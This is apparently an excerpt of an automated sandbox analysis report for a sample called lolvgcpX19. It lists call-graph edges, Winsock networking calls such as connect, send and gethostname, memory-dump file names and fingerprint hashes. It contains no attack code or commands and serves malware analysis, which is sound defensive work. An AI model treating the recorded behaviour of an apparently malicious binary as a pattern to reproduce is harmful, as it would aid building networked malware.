1875->1883 1877->1848 1884 104ad5c-104ad6b 1878->1884 1878->1885 1879->1878 1879->1885 1880->1864 1887 104ad04-104ad08 1882->1887 1888 104ac4c-104ac51 1882->1888 1890 104ace7-104acfe 1883->1890 1891 104ac80-104ac9b 1883->1891 1892 104ad70-104ad78 1884->1892 1885->1848 1887->1871 1896 104ad0a-104ad28 1887->1896 1888->1887 1897 104ac57-104ac78 1888->1897 1890->1887 1891->1890 1898 104ac9d-104acc1 1891->1898 1894 104ada0-104adb2 connect 1892->1894 1895 104ad7a-104ad7f 1892->1895 1900 104adb3-104adcf 1894->1900 1895->1894 1899 104ad81-104ad99 1895->1899 1896->1871 1896->1885 1901 104acc6-104acd7 1897->1901 1898->1901 1899->1900 1908 104add5-104add8 1900->1908 1909 104ae8a-104ae91 1900->1909 1901->1885 1907 104acdd-104ace5 1901->1907 1907->1887 1907->1890 1910 104ade1-104adf1 1908->1910 1911 104adda-104addf 1908->1911 1909->1851 1912 104adf3-104ae07 1910->1912 1913 104ae0d-104ae12 1910->1913 1911->1892 1911->1910 1912->1913 1919 104aea8-104aead 1912->1919 1914 104ae14-104ae17 1913->1914 1915 104ae1a-104ae1c call 104af70 1913->1915 1914->1915 1918 104ae21-104ae23 1915->1918 1920 104ae25-104ae27 1918->1920 1921 104ae93-104ae9d 1918->1921 1919->1851 1920->1851 1922 104aeaf-104aeb1 call 103e760 1921->1922 1923 104ae9f-104aea6 call 103e7c0 1921->1923 1927 104aeb6-104aebe 1922->1927 1923->1927 1928 104aec0-104aedb call 103e180 1927->1928 1929 104af1a-104af1f 1927->1929 1928->1851 1932 104aee1-104aeec 1928->1932 1929->1851 1933 104af02-104af06 1932->1933 1934 104aeee-104aeff 1932->1934 1935 104af0e-104af15 1933->1935 1936 104af08-104af0b 1933->1936 1934->1933 1935->1843 1936->1935
                                  APIs
                                  • socket.WS2_32(FFFFFFFF,?,00000000), ref: 0104AB9B
                                  • ioctlsocket.WS2_32(00000000,8004667E,00000001), ref: 0104ABE4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ioctlsocketsocket
                                  • String ID:
                                  • API String ID: 416004797-0
                                  • Opcode ID: b387edef7377a2b0be7a4317a35c002660033b526c626d2ae87d3e253d301d0b
                                  • Instruction ID: f133ada611dc0f4a0504c2dc18c4baf08474acc8891ebbf9a2722821d9a3ccbb
                                  • Opcode Fuzzy Hash: b387edef7377a2b0be7a4317a35c002660033b526c626d2ae87d3e253d301d0b
                                  • Instruction Fuzzy Hash: 35E1C0B0644302DBEB20CF29C884B6B7BE5EF85304F044A7CEADA8B291D775D944CB91
                                  Function 00F878B0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 20COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID: FD %s:%d sclose(%d)
                                  • API String ID: 2781271927-3116021458
                                  • Opcode ID: 5fd692137a006cd33ab3a5b91405c29687b96a84bac3c12f17ff157f16f9969f
                                  • Instruction ID: 295829faec33b19d8df2e610ef96a8967b4cc6364bd4bac603b4e242b0d98146
                                  • Opcode Fuzzy Hash: 5fd692137a006cd33ab3a5b91405c29687b96a84bac3c12f17ff157f16f9969f
                                  • Instruction Fuzzy Hash: FFD05E33A093212B863079996C49C8BBBA8DDC6F70B160C59F95067214D130DC0597E2
                                  Function 0104B060 Relevance: 3.0, APIs: 2, Instructions: 48networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0104B29E,?,00000000,?,?), ref: 0104B0BA
                                  • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,01033C41,00000000), ref: 0104B0C1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ErrorLastconnect
                                  • String ID:
                                  • API String ID: 374722065-0
                                  • Opcode ID: f6e083e7e3acec27ade94358eae7ccce9e5fab3a92bb621e974ced2266c16fcf
                                  • Instruction ID: 89c46129d3a48c946551c73daab48b28e3cd9c6d1b343a3b2d0c4f8b75db9399
                                  • Opcode Fuzzy Hash: f6e083e7e3acec27ade94358eae7ccce9e5fab3a92bb621e974ced2266c16fcf
                                  • Instruction Fuzzy Hash: 9801D8763042009BDB205A798CC4E6AB7D9FF89265F040B74F9BC931D1D726E9508751
                                  Function 01034950 Relevance: 1.7, APIs: 1, Instructions: 170networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • gethostname.WS2_32(00000000,00000040), ref: 01034AA5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: gethostname
                                  • String ID:
                                  • API String ID: 144339138-0
                                  • Opcode ID: 725e75d9e6ef61f98a61a7f54f20af4c2789f0aed2342244820a292e8dca1d66
                                  • Instruction ID: 4a7109d7c48f654369007ed779d90ecc07be8528a066aa0d38b662fa7f47d8a3
                                  • Opcode Fuzzy Hash: 725e75d9e6ef61f98a61a7f54f20af4c2789f0aed2342244820a292e8dca1d66
                                  • Instruction Fuzzy Hash: EA51DEB06047008BF7758A29DD497267ADCAF81318F0419BDDACACE6E1E7B4E440CB02
                                  Function 0104AF70 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                  Download Yara Rule
                                  APIs
                                  • getsockname.WS2_32(?,?,00000080), ref: 0104AFD1
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: getsockname
                                  • String ID:
                                  • API String ID: 3358416759-0
                                  • Opcode ID: aeaf1f1284308bad58707dd0e3973cd0feafe2f1f663fc278c05d1fdb76208ed
                                  • Instruction ID: 5d444060380517d064aac4adae3862fc2cebafa33f45b5475b5ee2f9674e6a46
                                  • Opcode Fuzzy Hash: aeaf1f1284308bad58707dd0e3973cd0feafe2f1f663fc278c05d1fdb76208ed
                                  • Instruction Fuzzy Hash: B7118470848785D6EB268F5CD4427F6B3F4EFC0329F109658E5D942150F73696C58BC2
                                  Function 0104A920 Relevance: 1.5, APIs: 1, Instructions: 44networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0104A97F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID:
                                  • API String ID: 2809346765-0
                                  • Opcode ID: 5504cd51007005db8927f0784c5fd47cc431fb1141e5f6402eabb2a57037b8b0
                                  • Instruction ID: 60c30068877849ad76e1540acf526e45ec47bb1bbaae27fdaa1f4b9996ee4891
                                  • Opcode Fuzzy Hash: 5504cd51007005db8927f0784c5fd47cc431fb1141e5f6402eabb2a57037b8b0
                                  • Instruction Fuzzy Hash: 8E01A7B9B107109FD6148F19DC85B56BBA5EF84720F06855DEA981B361C331AC108BD1
                                  Function 0104AF30 Relevance: 1.5, APIs: 1, Instructions: 29networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • socket.WS2_32(?,0104B280,00000000,-00000001,00000000,0104B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0104AF67
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID:
                                  • API String ID: 98920635-0
                                  • Opcode ID: 9e3a512b415a0ad5a01314b6e0b125609308271e4494e1585ebc4a9bb1de00ff
                                  • Instruction ID: fb44e682613fc8b1b661094b528af36203d1961e2ffa34bf1d5cfd78d7b2cef4
                                  • Opcode Fuzzy Hash: 9e3a512b415a0ad5a01314b6e0b125609308271e4494e1585ebc4a9bb1de00ff
                                  • Instruction Fuzzy Hash: 2DE06DB6A08321ABD650CA4CE8849ABF7A9EFC4B20F054A59B99463304C330AC418BE1
                                  Function 0104B020 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                  Download Yara Rule
                                  APIs
                                  • closesocket.WS2_32(?,01049422,?,?,?,?,?,?,?,?,?,?,?,01033377,01414C60,00000000), ref: 0104B04D
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: closesocket
                                  • String ID:
                                  • API String ID: 2781271927-0
                                  • Opcode ID: e6cc94970dda8b0d9ce95dc9f1e4c6a50faae5ab2f1b04a3081ffe9a9245f7d7
                                  • Instruction ID: 0176e544a765ebddceb6382b514a9b0ff094a28b15073104a32c196af345b812
                                  • Opcode Fuzzy Hash: e6cc94970dda8b0d9ce95dc9f1e4c6a50faae5ab2f1b04a3081ffe9a9245f7d7
                                  • Instruction Fuzzy Hash: D5D0C27830020157DA60CA18CCC4A577AAB7FC0211FA8CBB8F26C4A150C73BC8438A01
                                  Function 00FE67E0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • ioctlsocket.WS2_32(?,8004667E,?,?,00FBAF56,?,00000001), ref: 00FE67FC
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: ioctlsocket
                                  • String ID:
                                  • API String ID: 3577187118-0
                                  • Opcode ID: f56a927e121d313fb3eea7effaa763e943d88cf2e57a5aef322819a2f1dc5154
                                  • Instruction ID: 5335767ea5ac199031c40fe1b5b74374b33508c8d32c8bbad6a2ae0802a3cfbb
                                  • Opcode Fuzzy Hash: f56a927e121d313fb3eea7effaa763e943d88cf2e57a5aef322819a2f1dc5154
                                  • Instruction Fuzzy Hash: 59C012F1118101AFC6088B14D855A6F76D8DB85355F01581CB04A81180EA345994CA1A
                                  Function 00F831D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000017FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001907000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001910000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.00000000019F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.0000000001A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312661566.0000000001A02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312803582.0000000001BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312825589.0000000001BC1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f80000_lolvgcpX19.jbxd
                                  Similarity
                                  • API ID: CloseHandle
                                  • String ID:
                                  • API String ID: 2962429428-0
                                  • Opcode ID: 72b08a4387788cc96a94ec5df5562c25c5496d24b2749bf18962dca813483809
                                  • Instruction ID: 0faef0659c9571b45e1c1f89a103736744ba5623c04a3bc07d31d28799dd7bb7
                                  • Opcode Fuzzy Hash: 72b08a4387788cc96a94ec5df5562c25c5496d24b2749bf18962dca813483809
                                  • Instruction Fuzzy Hash: E631A0B4D087069BCB10FFB9C98469EBBF0AF54344F00896ED898A7351E7749A44DF92

                                  Non-executed Functions

                                  Function 0130E050 Relevance: 21.3, APIs: 8, Strings: 3, Instructions: 2082COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2311756034.0000000000F81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                  • Associated: 00000000.00000002.2311734066.0000000000F80000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.00000000014F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2311756034.0000000001659000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312282241.000000000165C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2312308079.000000000165E000.00000040.00000001.01000000.00000003.sdmpDownload File
